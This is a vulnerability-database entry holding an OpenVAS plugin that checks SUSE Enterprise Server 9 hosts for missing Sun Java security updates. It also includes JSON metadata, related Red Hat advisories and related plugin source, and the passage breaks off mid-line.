ID OPENVAS:136141256231065118 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2018-04-06T00:00:00
Description
The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
java2
java2-jre
For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5040565 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/
# OpenVAS Vulnerability Test
# $Id: sles9p5040565.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Security update for Sun Java
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
java2
java2-jre
For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5040565 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/";
tag_solution = "Please install the updates provided by SuSE.";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.65118");
script_version("$Revision: 9350 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)");
script_cve_id("CVE-2008-5360", "CVE-2008-5359", "CVE-2008-5358", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5344", "CVE-2008-5343", "CVE-2008-5342", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5339", "CVE-2008-2086", "CVE-2008-5355", "CVE-2008-5354", "CVE-2008-5353", "CVE-2008-5352", "CVE-2008-5351", "CVE-2008-5350", "CVE-2008-5349", "CVE-2008-5348", "CVE-2008-5347", "CVE-2008-5345", "CVE-2008-5346");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("SLES9: Security update for Sun Java");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"java2", rpm:"java2~1.4.2~129.48", rls:"SLES9.0")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:136141256231065118", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES9: Security update for Sun Java", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "published": "2009-10-10T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065118", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "lastseen": "2018-04-06T11:37:18", "viewCount": 0, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2018-04-06T11:37:18", "rev": 2}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2009:0016", "RHSA-2009:0369", "RHSA-2008:1018", "RHSA-2009:0445", "RHSA-2009:0466", "RHSA-2008:1025", "RHSA-2009:0015"]}, {"type": "suse", "idList": ["SUSE-SA:2009:007", "SUSE-SA:2009:018", "SUSE-SA:2009:001"]}, {"type": "openvas", "idList": ["OPENVAS:65822", "OPENVAS:136141256231065822", "OPENVAS:63151", "OPENVAS:65118", "OPENVAS:835195", "OPENVAS:65489", "OPENVAS:136141256231065489", "OPENVAS:136141256231063151", "OPENVAS:1361412562310835195", "OPENVAS:136141256231065907"]}, {"type": "seebug", "idList": ["SSV:4532"]}, {"type": "nessus", "idList": ["SUSE_JAVA-1_4_2-SUN-5852.NASL", "SUSE9_12321.NASL", "SUSE_11_0_JAVA-1_5_0-SUN-081217.NASL", "SUSE_11_1_JAVA-1_5_0-SUN-081217.NASL", "SUSE_JAVA-1_6_0-SUN-5876.NASL", "SUN_JAVA_JRE_244986_UNIX.NASL", "REDHAT-RHSA-2008-1018.NASL", "REDHAT-RHSA-2008-1025.NASL", "SUSE_11_1_JAVA-1_6_0-SUN-081217.NASL", "SUN_JAVA_JRE_244986.NASL"]}, {"type": "fedora", "idList": ["FEDORA:2B4E3208DD6", "FEDORA:F07BD208DD2"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9483", "SECURITYVULNS:DOC:21257"]}, {"type": "ubuntu", "idList": ["USN-713-1"]}, {"type": "cve", "idList": ["CVE-2008-5346", "CVE-2008-5354", "CVE-2008-5353", "CVE-2008-5355", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5358", "CVE-2008-5349", "CVE-2008-5359", "CVE-2008-5360"]}], "modified": "2018-04-06T11:37:18", "rev": 2}, "vulnersScore": 8.3}, "pluginID": "136141256231065118", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5040565.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Sun Java\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65118\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5358\", \"CVE-2008-5357\", \"CVE-2008-5356\", \"CVE-2008-5344\", \"CVE-2008-5343\", \"CVE-2008-5342\", \"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5339\", \"CVE-2008-2086\", \"CVE-2008-5355\", \"CVE-2008-5354\", \"CVE-2008-5353\", \"CVE-2008-5352\", \"CVE-2008-5351\", \"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5348\", \"CVE-2008-5347\", \"CVE-2008-5345\", \"CVE-2008-5346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Sun Java\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java2\", rpm:\"java2~1.4.2~129.48\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"redhat": [{"lastseen": "2019-12-11T13:32:08", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical vulnerabilities.\nThese are summarized in the \"Advance notification of Security Updates for\nJava SE\" from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:47", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1018", "href": "https://access.redhat.com/errata/RHSA-2008:1018", "type": "redhat", "title": "(RHSA-2008:1018) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. \n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2017-09-08T12:08:51", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0016", "href": "https://access.redhat.com/errata/RHSA-2009:0016", "type": "redhat", "title": "(RHSA-2009:0016) Critical: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These are\nsummarized in the \"Advance notification of Security Updates for Java SE\"\nfrom Sun Microsystems. \n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:56", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1025", "href": "https://access.redhat.com/errata/RHSA-2008:1025", "type": "redhat", "title": "(RHSA-2008:1025) Critical: java-1.5.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM(r) 1.4.2 SR13 Java(TM) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5350, CVE-2008-5351, CVE-2008-5353, CVE-2008-5354,\nCVE-2008-5359, CVE-2008-5360)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13 Java release. All running\ninstances of IBM Java must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-04-23T04:00:00", "id": "RHSA-2009:0445", "href": "https://access.redhat.com/errata/RHSA-2009:0445", "type": "redhat", "title": "(RHSA-2009:0445) Critical: java-1.4.2-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM 1.6.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. \n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR3 Java release.", "modified": "2017-09-08T11:55:57", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0015", "href": "https://access.redhat.com/errata/RHSA-2009:0015", "type": "redhat", "title": "(RHSA-2009:0015) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3103", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "This update corrects several security vulnerabilities in the IBM Java 2\nRuntime Environment and the IBM Java 2 Software Development Kit, shipped as\npart of Red Hat Network Satellite Server. In a typical operating\nenvironment, these are of low security risk as the runtime is not used on\nuntrusted applets.\n\nSeveral vulnerabilities were discovered in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-3103, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\nCVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357, CVE-2008-5359,\nCVE-2008-5360)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2016-04-04T18:36:43", "published": "2009-05-07T04:00:00", "id": "RHSA-2009:0466", "href": "https://access.redhat.com/errata/RHSA-2009:0466", "type": "redhat", "title": "(RHSA-2009:0466) Low: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5351", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358"], "description": "The IBM(r) 1.6.0 Java(TM) release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T12:20:12", "published": "2009-03-25T04:00:00", "id": "RHSA-2009:0369", "href": "https://access.redhat.com/errata/RHSA-2009:0369", "type": "redhat", "title": "(RHSA-2009:0369) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-26T08:55:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65118", "href": "http://plugins.openvas.org/nasl.php?oid=65118", "type": "openvas", "title": "SLES9: Security update for Sun Java", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5040565.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Sun Java\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java2\n java2-jre\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5040565 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65118);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5358\", \"CVE-2008-5357\", \"CVE-2008-5356\", \"CVE-2008-5344\", \"CVE-2008-5343\", \"CVE-2008-5342\", \"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5339\", \"CVE-2008-2086\", \"CVE-2008-5355\", \"CVE-2008-5354\", \"CVE-2008-5353\", \"CVE-2008-5352\", \"CVE-2008-5351\", \"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5348\", \"CVE-2008-5347\", \"CVE-2008-5345\", \"CVE-2008-5346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Sun Java\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java2\", rpm:\"java2~1.4.2~129.48\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:001.", "modified": "2018-04-06T00:00:00", "published": "2009-01-13T00:00:00", "id": "OPENVAS:136141256231063151", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063151", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:001 (Sun Java)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_001.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:001 (Sun Java)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sun Java received several security fixes and was updated to:\n\n- Sun Java 1.6.0 to Update 11-b03\n- Sun Java 1.5.0 to Update 17\n- Sun Java 1.4.2 to Update 19\n\nNumerous security issues such as privilege escalations, and sandbox\nbreakouts were fixed.\n\n(CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357,\nCVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342,\nCVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086,\nCVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352,\nCVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348,\nCVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:001\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:001.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63151\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:001 (Sun Java)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", 